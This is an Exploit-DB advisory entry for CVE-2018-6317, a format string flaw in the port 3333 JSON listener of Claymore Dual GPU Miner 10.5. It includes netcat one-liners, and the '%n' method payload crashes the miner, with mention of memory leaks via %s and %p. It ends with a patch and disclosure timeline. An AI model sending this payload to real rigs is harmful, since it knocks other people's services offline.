Claymore Dual GPU Miner 10.5 - Format String

EDB-ID: 43972
Author: res1n
Published: 2018-02-05
CVE: CVE-2018-6317
Type: Dos
Platform: Multiple
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

  
After reading about the recent vulnerabilities with previous versions, I thought I should take another look at the json listener on port 3333 and see if there was any avenues of attack.

echo -e '{"id":1,"jsonrpc":"1.0","method":"test"}' | nc 192.168.1.107 3333 & printf "\n"

After realizing the buffer was printed I decided to try a few others…

Sending %s does return some strings, however I couldn’t get the hex addresses padded properly to dig in more as I kept getting unable to parse json errors. Sending %p also did yield some results but I’m sure someone more qualified may be able to exploit the stack further…

Finally, sending %n completely kills the mining process.

echo -e '{"id":1,"jsonrpc":"1.0","method":"%n"}' | nc 192.168.1.139 3333 & printf "\n"

Keep your rigs up to date, or stop opening port 3333 to the public. Seriously.

Timeline
01/26/18 — Reported

01/26/18 —Confirmed and immediately patched. 10.6 released request for 3–4 day embargo

01/31/18 — Public Disclosure

Related Posts

Comments